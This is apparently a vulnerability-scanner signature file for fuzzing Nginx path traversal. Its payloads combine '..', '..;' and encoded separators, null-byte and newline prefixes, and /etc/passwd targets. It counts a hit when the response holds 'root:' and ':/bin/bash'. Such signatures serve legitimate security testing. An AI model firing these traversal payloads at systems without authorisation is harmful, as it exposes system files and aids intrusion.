# info to search signature
id: nginx-traversal-path-01
type: fuzz
level: 2
info:
  name: Nginx Traversal Unix
  risk: High

variables:
  - prefix: |
      \
      .
      @
      %0A
      %00
  - separate: |
      ..
      ..;
      ..%3B
  - file: |
      etc/passwd
      /etc/passwd
      //etc/passwd

payloads:
  - '{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'

requests:
  - generators:
      - Path("{{.prefix}}{{.payload}}", "*")
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", ":/bin/bash")
